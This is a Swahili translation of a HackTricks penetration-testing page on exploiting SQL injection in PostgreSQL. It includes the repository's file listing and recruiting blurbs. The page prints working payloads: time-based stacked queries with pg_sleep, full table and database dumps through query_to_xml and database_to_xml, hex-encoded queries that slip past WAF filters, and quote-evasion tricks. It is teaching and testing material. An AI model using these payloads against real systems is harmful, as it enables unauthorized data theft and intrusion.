hacktricks/pentesting-web/sql-injection/postgresql-injection
2024-04-17 05:40:20 +00:00
..
big-binary-files-upload-postgresql.md Translated to Swahili 2024-02-11 02:13:58 +00:00
dblink-lo_import-data-exfiltration.md Translated to Swahili 2024-02-11 02:13:58 +00:00
network-privesc-port-scanner-and-ntlm-chanllenge-response-disclosure.md Translated to Swahili 2024-02-11 02:13:58 +00:00
pl-pgsql-password-bruteforce.md Translated to Swahili 2024-02-11 02:13:58 +00:00
rce-with-postgresql-extensions.md Translated to Swahili 2024-02-11 02:13:58 +00:00
rce-with-postgresql-languages.md GitBook: No commit message 2024-04-06 19:39:38 +00:00
README.md Translated ['binary-exploitation/basic-binary-exploitation-methodology/t 2024-04-17 05:40:20 +00:00

Kuingiza kwa PostgreSQL

Jifunze kuhusu kuingiza AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

Ikiwa una nia ya kazi ya kuingiza na kuingiza kwa yasiyoweza kuingizwa - tunakupa kazi! (inahitajika uwezo wa kuandika na kuzungumza Kipolishi kwa ufasaha).

{% embed url="https://www.stmcyber.com/careers" %}


Ukurasa huu unalenga kueleza mbinu tofauti ambazo zinaweza kukusaidia kuchexploitisha SQLinjection iliyopatikana kwenye database ya postgresql na kuzipatia mbinu unazoweza kupata kwenye https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md

Mwingiliano wa Mtandao - Ukarabati wa Mamlaka, Skana ya Bandari, Ufunuo wa Majibu ya Changamoto ya NTLM & Uchukuzi

Moduli ya PostgreSQL dblink inatoa uwezo wa kuunganisha kwenye mifano mingine ya PostgreSQL na kutekeleza uhusiano wa TCP. Vipengele hivi, vikiungwa mkono na utendaji wa COPY FROM, huwezesha hatua kama vile ukarabati wa mamlaka, skanning ya bandari, na kukamata majibu ya changamoto ya NTLM. Kwa njia za kina za kutekeleza mashambulizi haya angalia jinsi ya kutekeleza mashambulizi haya.

Unaweza kusoma mfano huu kuona mfano wa CTF wa jinsi ya kupakia data ndani ya vitu vikubwa na kisha kuchukua yaliyomo ya vitu vikubwa ndani ya jina la mtumiaji la kazi dblink_connect.

Mashambulizi ya PostgreSQL: Kusoma/kuandika, RCE, ukarabati wa mamlaka

Angalia jinsi ya kudhuru mwenyeji na kuongeza mamlaka kutoka PostgreSQL katika:

{% content-ref url="../../../network-services-pentesting/pentesting-postgresql.md" %} pentesting-postgresql.md {% endcontent-ref %}

Kupitisha WAF

Vipengele vya String vya PostgreSQL

Kubadilisha strings inaweza kukusaidia kupitisha WAFs au vizuizi vingine.
Kwenye ukurasa huu unaweza kupata baadhi ya Vipengele vya Strings vinavyoweza kutumika.

Mipangilio Iliyopangwa

Kumbuka kwamba postgresql inasaidia mipangilio iliyopangwa, lakini programu kadhaa zitatoa kosa ikiwa majibu 2 yatarudi wakati inatarajia 1 tu. Lakini, bado unaweza kutumia vibaya mipangilio iliyopangwa kupitia Kuingiza ya Wakati:

id=1; select pg_sleep(10);-- -
1; SELECT case when (SELECT current_setting('is_superuser'))='on' then pg_sleep(10) end;-- -

Mbinu za XML

query_to_xml

Hii kazi itarudisha data yote katika muundo wa XML katika faili moja tu. Ni bora ikiwa unataka kudump data nyingi katika safu moja tu:

SELECT query_to_xml('select * from pg_user',true,true,'');

database_to_xml

Hii function itadump database nzima kwa muundo wa XML katika safu 1 tu (kuwa makini ikiwa database ni kubwa sana kwani unaweza kuisababishia DoS au hata mteja wako mwenyewe):

SELECT database_to_xml(true,true,'');

Strings in Hex

Ikiwa unaweza kuendesha mambo kwa kuwapitisha ndani ya string (kwa mfano kutumia kazi ya query_to_xml). Unaweza kutumia convert_from kuwapitisha string kama hex na kuepuka mifumo ya kuchuja njia hii:

select encode('select cast(string_agg(table_name, '','') as int) from information_schema.tables', 'hex'), convert_from('\x73656c656374206361737428737472696e675f616767287461626c655f6e616d652c20272c272920617320696e74292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573', 'UTF8');

# Bypass via stacked queries + error based + query_to_xml with hex
;select query_to_xml(convert_from('\x73656c656374206361737428737472696e675f616767287461626c655f6e616d652c20272c272920617320696e74292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573','UTF8'),true,true,'')-- -h

# Bypass via boolean + error based + query_to_xml with hex
1 or '1' = (query_to_xml(convert_from('\x73656c656374206361737428737472696e675f616767287461626c655f6e616d652c20272c272920617320696e74292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573','UTF8'),true,true,''))::text-- -

{% endcode %}

Alama za kutumia

Ikiwa huwezi kutumia alama za nukta kwa payload yako unaweza kuzipuuza kwa kutumia CHR kwa ajili ya misingi ya vifungu (upatanishaji wa herufi pekee unafanya kazi kwa misingi ya msingi kama vile SELECT, INSERT, DELETE, nk. Haifanyi kazi kwa taarifa zote za SQL_)

SELECT CHR(65) || CHR(87) || CHR(65) || CHR(69);

Au na $. Hizi mizunguko ya kuuliza huleta matokeo sawa:

SELECT 'hacktricks';
SELECT $$hacktricks$$;
SELECT $TAG$hacktricks$TAG$;

Ikiwa una nia ya kazi ya udukuzi na kudukua yasiyoweza kudukuliwa - tunakupa kazi! (ujuzi wa Kipolishi wa kuandika na kusema unahitajika).

{% embed url="https://www.stmcyber.com/careers" %}

Jifunze udukuzi wa AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks: